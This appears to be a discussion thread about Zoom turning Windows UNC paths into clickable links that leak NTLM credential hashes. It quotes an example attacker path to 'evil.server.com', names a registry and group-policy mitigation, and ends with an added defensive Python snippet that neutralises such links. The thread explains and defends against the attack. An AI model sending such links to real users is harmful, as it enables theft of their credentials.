
Zoom Lets Attackers Steal Windows Credentials via UNC Links - JDW1023
https://www.bleepingcomputer.com/news/security/zoom-lets-attackers-steal-windows-credentials-via-unc-links/
======
rkagerer
Not to say they shouldn't mitigate it (which should be trivial), but this
seems to me like more of a Windows "bug" than a Zoom one.

Basically attacker sends:

    \\evil.server.com\img\cat.jpg

Zoom client makes it a clickable link. When clicked, SMB sends your username
and NTLM password hash to the remote server (just like it would when
connecting to any other file share).

Can be mitigated with a group policy or registry tweak (Network security:
Restrict NTLM: Outgoing NTLM traffic to remote servers /
RestrictSendingNTLMTraffic) but that can cause side effects (particularly when
joined to a domain).

IMO the out-of-box OS behavior ought to ask you before sending any credentials
to a strange server - like SSH clients do the first time they connect to a new
host. (After all, it's not like you walk down the street advertising your ID
to strangers).
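
An added example, not part of the original comment and not Zoom's code: one way a chat client could apply the mitigation described above by rendering UNC paths as plain text instead of clickable links, and reporting which remote hosts a message names. It goes beyond the comment's single case by also covering the `\\?\UNC\` long form and `file://` URLs with a host; the function names and the `SAFE_SCHEMES` allow-list are assumptions.

```python
import re
from urllib.parse import urlsplit

# \\host\share[\path], including the long form \\?\UNC\host\share
UNC_RE = re.compile(r"\\\\(?:\?\\UNC\\)?(?P<host>[^\\/\s?]+)\\[^\\/\s]+", re.IGNORECASE)
# Anything in a chat message that a client might be tempted to linkify
CANDIDATE_RE = re.compile(r"\\\\\S+|\b[a-z][a-z0-9+.-]*://\S+", re.IGNORECASE)
SAFE_SCHEMES = {"http", "https"}  # assumption: the only schemes worth making clickable


def remote_smb_host(token):
    """Return the host Windows would contact over SMB for this token, else None."""
    m = UNC_RE.match(token)
    if m:
        host = m.group("host").lower()
        return None if host == "." else host  # \\.\ is the local device namespace
    try:
        parts = urlsplit(token)
    except ValueError:  # malformed URL, e.g. an unbalanced IPv6 bracket
        return None
    if parts.scheme.lower() == "file" and parts.hostname not in (None, "localhost"):
        return parts.hostname.lower()
    return None


def render_tokens(message):
    """Split a message into (kind, text) pairs; only http(s) URLs get kind 'link'."""
    out, pos = [], 0
    for m in CANDIDATE_RE.finditer(message):
        if m.start() > pos:
            out.append(("text", message[pos:m.start()]))
        tok = m.group(0)
        scheme = "" if tok.startswith("\\\\") else tok.split("://", 1)[0].lower()
        out.append(("link" if scheme in SAFE_SCHEMES else "text", tok))
        pos = m.end()
    if pos < len(message):
        out.append(("text", message[pos:]))
    return out


def smb_hosts(message):
    """Remote hosts named by UNC-style tokens in the message, for logging or alerting."""
    hits = (remote_smb_host(m.group(0)) for m in CANDIDATE_RE.finditer(message))
    return [h for h in hits if h]


# Constructed sample message; the first path is the one quoted in the comment above.
SAMPLE = r"look at \\evil.server.com\img\cat.jpg and https://example.com/a plus file://fileserver.example/share/x"
```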

